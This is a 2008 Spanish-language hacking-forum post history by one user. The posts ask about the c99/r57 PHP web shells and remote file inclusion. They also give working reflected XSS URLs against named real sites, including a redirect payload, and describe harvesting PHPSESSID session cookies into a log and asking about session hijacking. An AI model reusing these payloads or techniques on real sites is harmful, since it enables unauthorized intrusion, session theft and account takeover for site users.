Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Achernar

#1
Nivel Web / Re: c99.txt y r57.txt
30 Mayo 2008, 22:41 PM
mm todavia con el ? al final no funciona, seguro que no es vulnerable.  :P

Cita de: Azielito en 30 Mayo 2008, 20:08 PM
Y seguro que es vulnerable?

no es inclusion por iframes? ;D

Suele pasar :P

checa si en lugar de hacer include con php sea con iframes, o frames :P

como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas.

me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis

Citar<html><head><title>www.google.com</title></head><frameset rows="100,*" frameborder="0" border="0" framespacing="0"><frame noresize="noresize" src="allc_header.php?url=www.google.com" scrolling=no marginwidth=0 marginheight=0><frame src=http://www.google.com><noframes>Your browser does not support frames. allc.com uses frames to display results.  You can view the <a href=http://www.google.com>referring page</a> </noframes></frameset></html>

si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google?

ah y de verdad muchas gracias a los dos por darme una mano  ;D ;D ;D
#2
Nivel Web / Re: c99.txt y r57.txt
30 Mayo 2008, 18:35 PM
se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo.

alguien me podria decir porque esto funciona:

php?url=www.google.com

y esto no funciona

php?url=usuarios.lycos.es/theripperm/shell/r57.txt

este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?

:huh: :huh: :huh:
#3
Nivel Web / c99.txt y r57.txt
30 Mayo 2008, 18:15 PM
quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.
#4
Nivel Web / Nuevo Mensaje
26 Mayo 2008, 18:56 PM
Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0
#5
es un ping tradicional, usas el protocolo ICMP para eso?
#6
Karcrack, conseguiste iniciar sesión por consola o con algún programa? algún ejemplo o detalle para comentar? ese link que diste esta mas avanzado que otros que yo habia visto. Saludos.
;D
#7
Nivel Web / Dudas sobre XXS
13 Abril 2008, 04:01 AM
cuando en una pagina se piden datos.. tambien se pueden insertar scripts ahi no? pero que pasa con las paginas que siempre ponen (") a inicio y al final de la cadena de texto o cuando codifican los caracteres < y > ? estas paginas no son vulnerables o hay tecnicas para saltar estos filtros?

otra cosa sobre los scripts. ¿tambièn se puede hacer con vbscript? y dònde puedo aprender mas sobre scripts?  es muy boba la pregunta, pero quizàs àlguien tenga algùn buen link.

Gracias.
#8
Nivel Web / Re: [XSS] lawebdelprogramador
12 Abril 2008, 12:57 PM
Cita de: Ferñhu en 12 Abril 2008, 02:24 AM
creo q es xss no xxs, pero es una tonteria jej :p

solucionado, Gracias  ;D.


Cita de: berz3k en 12 Abril 2008, 02:23 AM
Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?


Cita de: Ferñhu en 12 Abril 2008, 02:24 AM

Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.


Nu sabia, si hay que borrar el post esta todo bien :]
#9
Nivel Web / [XSS] lawebdelprogramador
12 Abril 2008, 01:48 AM
la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades!  :xD :xD :xD

#10
Nivel Web / Re: [XSS] foroswebgratis
9 Abril 2008, 00:43 AM
Cita de: Asfasfos en  8 Abril 2008, 18:00 PM
Seguramente por las comillas dobles

es verdad, porque esto SI funciona:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert()</script>

y mi duda sobre las cookies es asi:

Si las cookies robadas pertenecen a la pagina mediante la cual se esta llevando el ataque, o sea... en este caso solo se pueden robar cookies de la pagina foroswebgratis? o si la persona esta, por ejemplo, tambien logueada en otro foro al mismo tiempo... esas cookies tambien pueden ser robadas? o es necesario una vulnerabilidad similar en la otra pagina?

----------------- Minutos despues ----------------------

segui paso a paso las instrucciones y al usar el codigo en la pagina se crea un archivo log.txt que contiene valores de PHPSESSID, me aprecen 3 y son el mismo valor asi que supongo que son solo de la misma pagina (foroswebgratis)

Pero PHPSESSID no son cookies, no son un valor para definir una sesion? se puede emplear para suplantar la sesion de un usuario?